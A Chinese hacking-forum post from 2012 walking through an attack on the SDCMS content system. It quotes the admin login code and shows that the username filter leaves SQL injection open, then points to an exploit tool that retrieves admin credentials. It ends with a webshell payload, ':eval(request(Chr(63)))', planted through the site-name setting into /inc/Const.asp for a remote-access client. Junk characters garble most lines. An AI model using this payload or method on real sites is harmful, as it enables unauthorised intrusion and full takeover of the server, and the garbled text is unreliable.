作者:T00LS 鬼哥
5 T5 ?) m, w6 ]9 i2 R漏洞文件:后台目录/index.asp( o( w0 P2 g! O+ F8 v5 k0 b; Y
& c9 z! z( T( a' c$ l0 m
Sub Check
: `$ v/ U" @5 N0 F Dim username,password,code,getcode,Rs
$ T @ a1 K6 r' a& L6 D IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
5 d! p1 N# n$ g X# [" K+ [ username=FilterText(Trim(Request.Form("username")),1)
+ q1 h/ ?+ ?* L! u) Y password=FilterText(Trim(Request.Form("password")),1)2 t2 T! l' J" M6 g8 W; Q
code=Trim(Request.Form("yzm"))5 |0 Y' a& [! V7 J
getcode=Session("SDCMSCode")
% _5 Z1 M* c4 L! v1 {. S IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died8 I* j7 o9 ]0 O" _. B" U& h0 F
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
/ V! C9 a+ \7 G9 w/ S IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
8 z+ n Z' c( {$ ~: }1 s IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
0 D6 @# i1 p& [- B8 h3 h IF username="" or password="" Then n/ U' t# S- l+ m9 k% w
Echo "用户名或密码不能为空"ied. T/ N$ a7 u. B4 a: M; O
Else* m x' R+ q2 k3 B
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
% y" S6 ~8 ^1 ?# z/ ?2 i* N IF Rs.Eof Then* r( ~9 q! R9 L8 l3 K8 N5 N! |
AddLog username,GetIp,"登录失败",1( ~$ N2 v1 X$ N' T/ k
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
+ r( J3 Q8 x$ ~; L0 o4 R$ L3 p- E Else
+ r7 S+ E" a1 E1 f8 U D Add_Cookies "sdcms_id",Rs(0)% f W! m- H; z# P
Add_Cookies "sdcms_name",username
& g2 `- w( P7 Q Add_Cookies "sdcms_pwd",Rs(2)
5 g9 ?* B2 k4 r: K" [ Add_Cookies "sdcms_admin",Rs(3)0 r0 Q6 N; T! `; e5 A
Add_Cookies "sdcms_alllever",Rs(4)' c2 B; X6 f: N2 H, P
Add_Cookies "sdcms_infolever",Rs(5)
, \5 _) Q% j( X3 G4 ~ Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")% ]5 f% M1 X6 _% b1 V$ C; `, F( v
AddLog username,GetIp,"登录成功",1
4 Q& G( w" u0 A. l2 Q$ s4 P" S6 L '自动删除30天前的Log记录
4 V4 m3 S2 w6 h+ O1 v IF Sdcms_DataType Then: X- h/ n* O% c! [
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
% `- V3 {+ f2 t1 Z$ E, k; c Else( R% R3 k0 J; o; W6 P% y/ t
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")9 L8 k* r* Z. t1 G" r
End IF% r. o, A: k4 P3 `
Go("sdcms_index.asp")4 K) Y# ]6 n! C% g
End IF
* P* H" T6 L8 r/ ~ Rs.Close1 R7 u3 k# M+ j5 H# u/ M
Set Rs=Nothing) r8 P t! c- r2 w
End IF9 c5 e; ]. m- S% P
End Sub' ?; s3 R3 D: U2 x2 G. p
. N) Q$ x- U# f c) q3 Z G
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
# G. j# G5 P6 \+ [ _% ?0 K; E; `- Z2 \9 a! m: E
Function FilterText(ByVal t0,ByVal t1)3 o9 o7 R; v1 t8 }
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
! c j4 w' ~) _8 M6 U t0=Trim(t0)
9 s' B" m8 {& T Select Case t1- }) H1 c5 G1 O9 Z2 B4 s
Case "1"2 p5 u" C( n( K8 A
t0=Replace(t0,Chr(32),"")
9 J K' _. ]) W* d; U" S/ n t0=Replace(t0,Chr(13),"")
% t7 @- X6 V3 `( C& e' O% X4 | t0=Replace(t0,Chr(10)&Chr(10),"")
0 j0 Q6 l& V5 z& S t0=Replace(t0,Chr(10),"")1 x0 I% _" I7 E8 E5 \6 ]
Case "2"6 P6 ?; M- P, C
t0=Replace(t0,Chr(8),"")'回格
. A T4 @$ T; X% l( U( l t0=Replace(t0,Chr(9),"")'tab(水平制表符)
; ]- q9 [& H# L- h) x t0=Replace(t0,Chr(10),"")'换行
+ `2 D1 x) e$ l* V. k t0=Replace(t0,Chr(11),"")'tab(垂直制表符)' [* c8 _1 r1 ^8 Y/ e
t0=Replace(t0,Chr(12),"")'换页' m% C! c/ T, O W6 \( j
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合8 u" x, t5 q: W3 P
t0=Replace(t0,Chr(22),"")2 z6 C* e+ ?9 w+ w- r/ G+ V
t0=Replace(t0,Chr(32),"")'空格 SPACE
8 |+ L, C# k0 R( z+ b- t t0=Replace(t0,Chr(33),"")'!
2 j( l+ ~1 `' ^. s t0=Replace(t0,Chr(34),"")'"
+ D. R+ k" X/ x2 C& u t0=Replace(t0,Chr(35),"")'#
( o' p7 d% f. T5 | t0=Replace(t0,Chr(36),"")'$
# C; W$ M9 c* b9 Q- i5 F t0=Replace(t0,Chr(37),"")'%
, b5 p2 ~5 w& B t0=Replace(t0,Chr(38),"")'&
' _. Y. D; O5 ?: U0 Z' d' a7 R t0=Replace(t0,Chr(39),"")''
" j4 j' X F/ b" S' y. w' ?% W* O5 j t0=Replace(t0,Chr(40),"")'(
* [# h: u: L8 |/ U K8 j t0=Replace(t0,Chr(41),"")')4 g1 n9 e$ K9 N& c4 l. q
t0=Replace(t0,Chr(42),"")'** t0 L! H; @' u1 T5 E
t0=Replace(t0,Chr(43),"")'+. u. j2 U1 ?: j) S1 ]" A& U
t0=Replace(t0,Chr(44),"")',
" s9 Z9 N K; O5 _4 y t0=Replace(t0,Chr(45),"")'-
& J {# L. o( \/ @$ A) `9 ]" Q t0=Replace(t0,Chr(46),"")'.
" j" `& r2 t# F: i t0=Replace(t0,Chr(47),"")'/
1 ~1 L7 Z1 i2 U' @# X' @ t0=Replace(t0,Chr(58),"")':
# A4 d ?5 ~+ y- r: F t0=Replace(t0,Chr(59),"")';& u) B, k8 K) [* Y u
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>8 n% B$ z. ~$ ?/ T3 k
t0=Replace(t0,Chr(63),"")'?
4 [. Z( @' H+ } t0=Replace(t0,Chr(64),"")'@$ O3 {0 s% K7 N R" P2 Y* `
t0=Replace(t0,Chr(91),"")'\
# I, n* l! O% p: g t0=Replace(t0,Chr(92),"")'\
3 ]; V: j, _2 n7 D/ N t0=Replace(t0,Chr(93),"")']: i) @' b! D5 a. F
t0=Replace(t0,Chr(94),"")'^
" Y) [* _0 K0 P, @6 q/ Y* W/ F t0=Replace(t0,Chr(95),"")'_
, C+ {8 |: {7 ?2 q7 S* v$ i2 j( p% N t0=Replace(t0,Chr(96),"")'`
% i8 ~/ A4 \4 I" C, D% Y6 l t0=Replace(t0,Chr(123),"")'{1 a! X- I Y, V! c
t0=Replace(t0,Chr(124),"")'|8 G1 [. p! k( e6 x; n7 f' Q
t0=Replace(t0,Chr(125),"")'}
* `% Q9 F& k5 _+ x1 \4 Z t0=Replace(t0,Chr(126),"")'~9 q6 l& \) l% e
Case Else
! T& P% R2 k( S) }+ } t0=Replace(t0, "&", "&")* V- w4 B; [/ _0 |8 l& J2 I+ z
t0=Replace(t0, "'", "'") f: ]# r% i, B! b
t0=Replace(t0, """", """)% ^& ?0 ^' W3 g( l
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
' i% m0 `) }. e. ?$ V End Select
1 A+ O( ?) G8 @3 d+ S7 x IF Instr(Lcase(t0),"expression")>0 Then
}. U" y: F( [4 f2 O$ V t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
# ^6 B) k+ M+ b& Y End If: W, n2 P, l- S+ c
FilterText=t0
1 g, t; y" X; ~+ I5 w. i! _End Function
X( A0 t4 i+ k
: l1 y6 H c/ G# W, W看到没。直接参数是1 只过滤
" r F6 y: @8 `6 Z5 s t0=Replace(t0,Chr(32)," ")- r% V3 \9 w) X* M% k0 H
t0=Replace(t0,Chr(13),""). M1 k4 k; D5 r" }6 j/ B; K8 f
t0=Replace(t0,Chr(10)&Chr(10),"' b# [$ S0 P9 V8 w m& w
")
/ `% F" Z" d' p$ q t0=Replace(t0,Chr(10),"
/ s9 j' H7 V' J! I")
7 l6 s! R2 x% w+ K9 {5 r漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
# z2 ]) t% o* n; y: D4 iEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
2 ?3 l: R# e6 F e8 q' J
- p: V& m8 C5 D1 N! V测试:
3 [! j2 d! w$ a. Y9 h9 z7 [& d b
) g5 F4 l+ O& |6 d l2 J0 M( a3 n0 m
现在输入工具上验证码,然后点OK, q+ p+ h4 Y+ t9 Q4 b1 U* G' `0 D
9 {5 P, t, z. T3 a0 r3 n
# A7 ^5 T6 p' d看到我们直接进入后台管理界面了,呵呵!
$ i0 i, T( O: l8 e( f: K- O" D/ L/ R: L
: C! B! n% H! F5 q
# _3 j- o+ E: ~/ ?这样直接进入后台了。。。。/ k4 @0 o& Z* }% k( {2 }* a% t
. A. K) Y0 n4 R" Y' H
6 ~( A0 E% n& w. ?& Q% e
& M. x/ ~! R1 `$ F4 ySDCMS提权:
7 z7 r6 @, z4 t
+ t9 F4 W/ C. x' S! S方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
% V5 \4 \+ ]0 v0 B7 W7 S5 M, I* R$ V5 M
* P& G6 O% D1 `0 ]4 w2 ] Y' Y2 b+ |/ N% X) C7 T
OK,现在用菜刀连接下!0 R8 A* ]. m; N5 _+ L$ Q. g. _
7 T( g0 _- w, k0 }' H+ ^7 j1 E, {2 y+ M$ ^$ }
5 y0 m! E" P' o
: E- Y8 a3 `8 _& ]* F8 l
* Q& P/ q& F2 G3 |2 e; n# r |
发表于 2012-11-9 20:57:02
收藏
支持
反对